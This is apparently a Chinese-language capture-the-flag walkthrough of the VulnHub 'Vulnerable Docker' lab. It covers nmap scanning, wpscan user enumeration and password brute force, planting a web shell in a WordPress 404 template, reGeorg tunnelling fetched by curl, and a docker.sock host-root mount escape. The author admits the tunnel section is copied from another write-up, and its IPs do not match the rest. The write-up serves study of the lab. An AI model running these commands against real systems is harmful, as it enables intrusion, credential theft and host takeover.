vulnhub-------docker_containement

===========================

个人收获:

1.利用reGeorg+Proxifier进行内网渗透

2.学会wpscan

3.学会了Docker Remote api

 

=============================

 

vulnhub-------docker_containement_第1张图片

下载地址:https://download.vulnhub.com/vulnerabledocker/

 

靶机总共有3个FLAG

=====================================================

靶机IP地址:192.168.110.131

Kali:192.168.110.128

 

======================================================

先用netdiscover来进行主机探索或者用nmap

discover -r 192.168.110.0/24

vulnhub-------docker_containement_第2张图片

nmap -sn 192.168.110.0/24

vulnhub-------docker_containement_第3张图片

 

然后使用nmap来对主机进行详细扫描

 

nmap -A 192.168.110.131

 

vulnhub-------docker_containement_第4张图片

 

发现主机打开了8000端口,我们看看

是一个博客

vulnhub-------docker_containement_第5张图片

 

我们在最底下发现博客使用wordpress搭建的

 

我们使用wpscan进行漏洞扫描

wpscan --url http://192.168.110.131:8000/
vulnhub-------docker_containement_第6张图片

 

打开http://192.168.110.131:8000/robots.txt 看看有什么线索

 

无可用信息

 

使用wpscan进行枚举用户

wpscan --url http://192.168.110.131:8000/ --enumerate u

vulnhub-------docker_containement_第7张图片

 

安装正常思维对用户名进行爆破

wpscan --url http://192.168.110.131:8000/ -e u --wordlist /root/1.txt

vulnhub-------docker_containement_第8张图片

vulnhub-------docker_containement_第9张图片

没有得到任何信息

 

这个时候我们在回头看起robots.txt,打开wp的登陆端

http://192.168.110.131:8000/wp-admin/

 

vulnhub-------docker_containement_第10张图片

 

我们使用刚刚爆破出来的用户名bob进行尝试,而在这里的密码需要使用burp进行爆破

vulnhub-------docker_containement_第11张图片

 

vulnhub-------docker_containement_第12张图片

 

爆破的结果:

vulnhub-------docker_containement_第13张图片

 

使用爆破成功的密码进入后台(找到第一个flag)

vulnhub-------docker_containement_第14张图片

 

 

接下来我们使用wp的在线编辑功能在404页面写入一句话就可以。

vulnhub-------docker_containement_第15张图片

 

*这里我用蚁剑连接老是报错无法连接,后来改用C刀就可以正常连接

 

收集下数据库的配置信息

vulnhub-------docker_containement_第16张图片

vulnhub-------docker_containement_第17张图片

 

然后我们用模拟终端查看下系统信息

查看下用户信息

vulnhub-------docker_containement_第18张图片

这个系统还是比较新的直接可以放弃提权,否则Dirty Cow之类的漏洞还是可以的。不过我们参考下面的一篇文章,找到一点灵感

https://paper.seebug.org/396/

 

 

输入ip addr

vulnhub-------docker_containement_第19张图片

想起题目是Vulnerable Docker VM 猜想应该就是docker.sock或者http api未授权访问之类的问题,但是翻了下没找到

 

但是看到机器的IP,感觉这个虚拟机里面应该还有个docker network的内网,简单的ping下,发现至少存在172.18.0.1-4的

这个时候需要坐下内网穿透,方便在我的电脑上操作,否则shell里面缺少很多工具和依赖,比较麻烦。

 

===========接下来的步骤没有成功,用curl提示执行失败,代码手动写到404文件也无法连接=====================

===========直接复制原来文章的步骤=============================================================

我使用的是 reGeorg:https://github.com/sensepost/reGeorg

curl -o tunnel.php 
 
https://raw.githubusercontent.com/sensepost/reGeorg/master/tunnel.nosocket.php

浏览器访问了一下,显示Georg says,'All seems fine'

本地电脑上运行python reGeorgSocksProxy.py -u http://192.168.30.171:8000/tunnel.php

 

[INFO   ]  Log Level set to [INFO]
[INFO   ]  Starting socks server [127.0.0.1:8888], tunnel at [http://192.168.30.171:8000/tunnel.php]
[INFO   ]  Checking if Georg is ready
[INFO   ]  Georg says, 'All seems fine'

因为reGeorg提供的是socks5代理,所以需要本地使用proxychains具体配置不多说了

proxychains mysql -u wordpress -pWordPressISBest -h 172.18.0.4 连接数据库,

但是并没有找到什么 flag,然后继续扫内网,还是nmap那一堆命令加上proxychains前缀就好。

然后发现一个IP有个奇怪的端口

Nmap scan report for 172.18.0.3
Host is up (0.0062s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp   open  ssh
8022/tcp open  oa-system

curl看了下,貌似是一个网页,然后在设置了浏览器的socks5代理,就看到了,原来是一个网页版ssh,而且这里面终于有docker.sock

vulnhub-------docker_containement_第20张图片

 

 

接下来就是老套路了,可以参考 :Docker学习与remote API未授权访问分析和利用:https://www.secpulse.com/archives/55928.html

而我是直接在另一个kali中里面安装了一个docker,这样就可以操作主机上的docker了。

 

 

然后使用volume挂载主机上的所有文件到一个目录

docker run -it --rm -v /:/vol wordpress /bin/bash

这样就可以看到flag_3

vulnhub-------docker_containement_第21张图片

参考资料:

Vulnerable Docker靶机下载:https://www.vulnhub.com/entry/vulnerable-docker-1,208/

Docker学习与remote API未授权访问分析和利用:https://www.secpulse.com/archives/55928.html

WPScan使用完整教程之记一次对WordPress的渗透过程: https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=46194&page=1#pid511454

Docker学习:https://www.bilibili.com/video/av17854410?from=search&seid=13990341548063716463

Tunnel Manager - From RCE to Docker Escape:https://paper.seebug.org/396/

reGeorg:https://github.com/sensepost/reGeorg

 

你可能感兴趣的:(CTF以及各类靶机,经验心得,VULHUB靶场题解集合)